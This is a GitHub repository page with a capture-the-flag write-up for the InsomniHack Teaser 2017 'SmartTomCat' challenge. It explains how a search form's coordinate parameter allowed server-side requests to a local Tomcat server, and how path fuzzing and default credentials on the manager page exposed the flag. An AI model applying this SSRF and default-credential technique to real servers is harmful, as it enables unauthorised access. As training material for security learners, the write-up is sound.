Skip to content

g0ku704/insomnihack-teaser-2017-smarttomcat

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits

tomcat

tomcat

 
 

README.md

README.md

 
 

apacheattack.py

apacheattack.py

 
 

output.txt

output.txt

 
 

tomcatfuzz.txt

tomcatfuzz.txt

 
 

usetheforce.sh

usetheforce.sh

 
 

Repository files navigation

InsomniHack Teaser 2017 SmartTomCat WriteUp

The question was like following:

Normal, regular cats are so 2000 and late, I decided to buy this allegedly smart tomcat robot Now the damn thing has attacked me and flew away. I can't even seem to track it down on the broken search interface... Can you help me ?
Search interface


alt tag First, in page source, the lattitue (X) and longitude (Y) parameters are posted like following 

...
    var cat_coords = 'http://localhost:8080/index.jsp?x=' + parseFloat($('#xcoord').val()) + '&y=' + parseFloat($('#ycoord').val());
    var $form = $(this);
    var $inputs = $form.find('input, select, button, textarea');
    $inputs.prop('disabled', true);

    request = $.ajax({
        url: '/index.php',
        type: 'post',
        success: function(data) {
          markers.clearMarkers();
          while(map.popups.length) {map.removePopup(map.popups[0]);}
          var y = parseFloat($('#ycoord').val());
          var x = parseFloat($('#xcoord').val());
          if (isNaN(y) || isNaN(x)) {y = 15.2833; x = -4.2667;}
          lonlat = new OpenLayers.LonLat(y,x).transform(new OpenLayers.Projection("EPSG:4326"),map.getProjectionObject());
          center_marker = new OpenLayers.Marker(lonlat);
          markers.addMarker(center_marker);
          popup = new OpenLayers.Popup.FramedCloud("popup",
                   lonlat,
                   null,
                   data, null,
                   true);
          map.addPopup(popup);
          map.setCenter(lonlat,zoom);
        },
        data: {
		u: cat_coords
	}
...

Next, I sent the request to Repeater and get the following response.
alt tag

In parameter, the X and Y parameters are sent with GET request to the local server on port 8080. When I tried to send request without parameters I get the following response.
alt tag

I only can send requests to the local server with X and Y included. Then, I looked for web contents in the local server and I found something interesting.
alt tag

Whoa! The smart 'tomcat' is actually Apache Tomcat server (Also the logo of Apache Tomcat is described in index page). I wrote a small Python and Bash fuzzing script to discover web contents in Apache Tomcat using Tomcat dorks. And then I found '/manager/html' directory exists but need authentication. alt tag

For HTTP basic authentication, I tried some default user:pass combination used in Apache Tomcat manager page and voila, flag is given in response.
alt tag
Flag: INS{th1s_is_re4l_w0rld_pent3st}

About

InsomniHack Teaser 2017 SmartTomCat

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages